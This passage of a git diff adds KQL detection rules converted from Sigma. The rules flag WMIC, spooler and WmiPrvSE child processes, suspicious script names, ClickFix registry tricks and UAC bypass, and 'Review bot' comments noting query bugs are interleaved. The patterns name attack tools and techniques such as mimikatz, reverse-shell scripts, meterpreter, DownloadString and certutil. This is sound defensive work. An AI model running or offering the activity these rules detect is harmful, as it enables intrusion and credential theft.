or InitiatingProcessFolderPath endswith "\\sqlagent.exe" or InitiatingProcessFolderPath endswith "\\sqlserver.exe" or InitiatingProcessFolderPath endswith "\\sqlservr.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "/c pwsh") or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6" or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql b/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql
new file mode 100644
index 00000000..327453f1
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Process Created Via Wmic.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-12
+// Level: high
+// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") and (ProcessCommandLine contains "process " and ProcessCommandLine contains "call " and ProcessCommandLine contains "create ")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_program_names.kql b/KQL/rules/Execution/suspicious_program_names.kql
new file mode 100644
index 00000000..8682999e
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_program_names.kql
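Review bot: The title says "Via Wmic.EXE", but the where clause never constrains the process to wmic: it fires on any process whose command line contains `process `, `call ` and `create ` together with one of the listed substrings, so a script host or shell with a matching command line would alert under this rule's name. The later rule suspicious_wmic_execution_via_office_process in this same patch does include the image check, so this one is inconsistent with it; append `and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")` to the predicate. If the omission comes from the Sigma source rather than the converter, it is worth confirming against the upstream rule before changing the generated output.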
@@ -0,0 +1,12 @@
+// Title: Suspicious Program Names
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: high
+// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate tools that accidentally match on the searched patterns
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "inject.ps1" or ProcessCommandLine contains "Invoke-CVE" or ProcessCommandLine contains "pupy.ps1" or ProcessCommandLine contains "payload.ps1" or ProcessCommandLine contains "beacon.ps1" or ProcessCommandLine contains "PowerView.ps1" or ProcessCommandLine contains "bypass.ps1" or ProcessCommandLine contains "obfuscated.ps1" or ProcessCommandLine contains "obfusc.ps1" or ProcessCommandLine contains "obfus.ps1" or ProcessCommandLine contains "obfs.ps1" or ProcessCommandLine contains "evil.ps1" or ProcessCommandLine contains "MiniDogz.ps1" or ProcessCommandLine contains "_enc.ps1" or ProcessCommandLine contains "\\shell.ps1" or ProcessCommandLine contains "\\rshell.ps1" or ProcessCommandLine contains "revshell.ps1" or ProcessCommandLine contains "\\av.ps1" or ProcessCommandLine contains "\\av_test.ps1" or ProcessCommandLine contains "adrecon.ps1" or ProcessCommandLine contains "mimikatz.ps1" or ProcessCommandLine contains "\\PowerUp_" or ProcessCommandLine contains "powerup.ps1" or ProcessCommandLine contains "\\Temp\\a.ps1" or ProcessCommandLine contains "\\Temp\\p.ps1" or ProcessCommandLine contains "\\Temp\\1.ps1" or ProcessCommandLine contains "Hound.ps1" or ProcessCommandLine contains "encode.ps1" or ProcessCommandLine contains "powercat.ps1") or ((FolderPath contains "\\CVE-202" or FolderPath contains "\\CVE202") or (FolderPath endswith "\\poc.exe" or FolderPath endswith "\\artifact.exe" or FolderPath endswith "\\artifact64.exe" or FolderPath endswith "\\artifact_protected.exe" or FolderPath endswith "\\artifact32.exe" or FolderPath endswith "\\artifact32big.exe" or FolderPath endswith "obfuscated.exe" or FolderPath endswith "obfusc.exe" or FolderPath endswith "\\meterpreter"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql b/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql
new file mode 100644
index 00000000..3b5c4ad0
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Remote Child Process From Outlook
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-12-27
+// Level: high
+// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202
+
+DeviceProcessEvents
+| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_runscripthelper_exe.kql b/KQL/rules/Execution/suspicious_runscripthelper_exe.kql
new file mode 100644
index 00000000..67f482ff
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_runscripthelper_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Runscripthelper.exe
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of powershell scripts via Runscripthelper.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_scan_loop_network.kql b/KQL/rules/Execution/suspicious_scan_loop_network.kql
new file mode 100644
index 00000000..c077a6ca
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_scan_loop_network.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Scan Loop Network
+// Author: frack113
+// Date: 2022-03-12
+// Level: medium
+// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
+// False Positives:
+// - Legitimate script
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql b/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql
new file mode 100644
index 00000000..c7016d0b
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql
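Review bot: `ProcessCommandLine contains "ping"` and `ProcessCommandLine contains "for "` are plain substring tests, so a command line containing `mapping`, `shipping` or `format ` satisfies them and this rule will fire on ordinary tooling well beyond scan loops. If a token match is the intent, KQL `has` (term-based, case-insensitive) would cut that noise, e.g. `| where (ProcessCommandLine has "for" or ProcessCommandLine has "foreach") and (ProcessCommandLine has "nslookup" or ProcessCommandLine has "ping")`, though `has` matches whole terms only and should be validated against the environment before swapping it in. At minimum the False Positives line should say that the substrings match inside longer words.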
@@ -0,0 +1,12 @@
+// Title: Suspicious Script Execution From Temp Folder
+// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
+// Date: 2021-07-14
+// Level: high
+// Description: Detects a suspicious script executions from temporary folder
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Administrative scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\Windows\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%" or ProcessCommandLine contains "%LocalAppData%\\Temp") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) and (not((ProcessCommandLine contains " >" or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "ConvertTo-Json" or ProcessCommandLine contains "-WindowStyle hidden -Verb runAs" or ProcessCommandLine contains "\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql
new file mode 100644
index 00000000..9fc8ff46
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Space Characters in RunMRU Registry Path - ClickFix
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-04
+// Level: high
+// Description: Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains " ")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql
new file mode 100644
index 00000000..41f0eae7
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql
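Review bot: `RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*"` treats the trailing `*` as a literal character, since KQL `endswith` has no wildcard, so a real key path ending in `...\Explorer\RunMRU` never satisfies it and the rule cannot fire; drop the star, or use `RegistryKey contains "\\Explorer\\RunMRU"` if a sub-key suffix was intended. Separately, the final alternative of the space-run group is `RegistryValueData contains " "` (a single space) as rendered here, which is true for any value containing a space and makes the twelve long-run alternatives before it redundant; if that is what the generated file holds, the detection collapses to the `#` test plus the key check, so verify the literal in the .kql output and drop it if it was a conversion artifact. The same space-run list is emitted in the TypedPaths rule (suspicious_space_characters_in_typedpaths_registry_path_filefix.kql) in the next hunk.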
@@ -0,0 +1,13 @@
+// Title: Suspicious Space Characters in TypedPaths Registry Path - FileFix
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-04
+// Level: high
+// Description: Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains " ")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_spool_service_child_process.kql b/KQL/rules/Execution/suspicious_spool_service_child_process.kql
new file mode 100644
index 00000000..780ab3de
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_spool_service_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Spool Service Child Process
+// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)
+// Date: 2021-07-11
+// Level: high
+// Description: Detects suspicious print spool service (spoolsv.exe) child processes.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.privilege-escalation, attack.t1068
+
+DeviceProcessEvents
+| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql b/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql
new file mode 100644
index 00000000..ed17f3de
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Use of CSharp Interactive Console
+// Author: Michael R. (@nahamike01)
+// Date: 2020-03-08
+// Level: high
+// Description: Detects the execution of CSharp interactive console by PowerShell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1127
+// False Positives:
+// - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csi.exe" and ProcessVersionInfoOriginalFileName =~ "csi.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql b/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql
new file mode 100644
index 00000000..2378d6b1
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious WindowsTerminal Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-25
+// Level: medium
+// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence
+// False Positives:
+// - Other legitimate "Windows Terminal" profiles
+
+DeviceProcessEvents
+| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql b/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql
new file mode 100644
index 00000000..53421d60
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious WMIC Execution Via Office Process
+// Author: Vadim Khrykov, Cyb3rEng
+// Date: 2021-08-23
+// Level: high
+// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
+// MITRE Tactic: Execution
+// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql b/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql
new file mode 100644
index 00000000..96ab164a
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious WmiPrvSE Child Process
+// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects suspicious and uncommon child processes of WmiPrvSE
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1047, attack.t1204.002, attack.t1218.010
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql b/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql
new file mode 100644
index 00000000..53a4cc71
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious WSMAN Provider Image Loads
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-24
+// Level: medium
+// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.lateral-movement, attack.t1021.003
+
+DeviceImageLoadEvents
+| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\PowerShell\\6\\pwsh.exe", "C:\\Program Files (x86)\\PowerShell\\7\\pwsh.exe", "C:\\Program Files\\PowerShell\\6\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")) or InitiatingProcessFolderPath endswith "\\mmc.exe" or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or 
InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_zipexec_execution.kql b/KQL/rules/Execution/suspicious_zipexec_execution.kql
new file mode 100644
index 00000000..345496a5
--- /dev/null
+++ b/KQL/rules/Execution/suspicious_zipexec_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious ZipExec Execution
+// Author: frack113
+// Date: 2021-11-07
+// Level: medium
+// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip")
\ No newline at end of file
diff --git a/KQL/rules/Execution/sysprep_on_appdata_folder.kql b/KQL/rules/Execution/sysprep_on_appdata_folder.kql
new file mode 100644
index 00000000..312d562c
--- /dev/null
+++ b/KQL/rules/Execution/sysprep_on_appdata_folder.kql
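Review bot: In the WSMAN provider rule's exclusion list, `InitiatingProcessCommandLine contains "svchost.exe -k netsvcs"` is a prefix of the more specific `"svchost.exe -k netsvcs -p -s BITS"` entry just before it, so the BITS entry is redundant and the broad one silences every service hosted in the netsvcs group, not just BITS. If that breadth is intended it deserves a `//` comment saying so; if not, the entry should be narrowed to the specific services that legitimately load the WSMAN DLLs. The `C:\\Windows\\Temp\\asgard2-agent\\` exclusion is keyed on a path under a user-writable temp directory rather than on a signed binary, which is a weaker allowlist than the rest of the list and is worth a comment naming the product it is for. This rule's where clause starts in the previous line of the diff.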
@@ -0,0 +1,12 @@
+// Title: Sysprep on AppData Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-06-22
+// Level: medium
+// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\AppData\\" and FolderPath endswith "\\sysprep.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..5c5cb7fd
--- /dev/null
+++ b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,13 @@
+// Title: System Disk And Volume Reconnaissance Via Wmic.EXE
+// Author: Stephen Lincoln '@slincoln-aiq' (AttackIQ)
+// Date: 2024-02-02
+// Level: medium
+// Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
+free space, and other disk information. This can be done using the 'wmic' command-line utility and has been
+observed being used by threat actors such as Volt Typhoon.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " volumename" or ProcessCommandLine contains " logicaldisk") or (ProcessCommandLine contains "path" and ProcessCommandLine contains "win32_logicaldisk") or (ProcessCommandLine contains " volume" and ProcessCommandLine contains " list ")) and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
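Review bot: In the System Disk And Volume Reconnaissance rule, the second and third lines of the multi-line Description (`free space, and other disk information. ...` and `observed being used by threat actors such as Volt Typhoon.`) are emitted without the `//` prefix, so the generated .kql file contains bare text before the query and will not parse as written. The converter should prefix every continuation line of a multi-line description with `// `, or fold the description onto a single comment line. The same defect appears in the FSharp interpreters rule (`Both can be used for AWL bypass ...`) and the Wusa.EXE rule (`Attackers could instantiate an instance of "wusa.exe" ...`) later in this diff.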
diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql
new file mode 100644
index 00000000..8451760c
--- /dev/null
+++ b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using IDiagnostic Profile
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-03
+// Level: high
+// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql
new file mode 100644
index 00000000..02b38d0c
--- /dev/null
+++ b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql
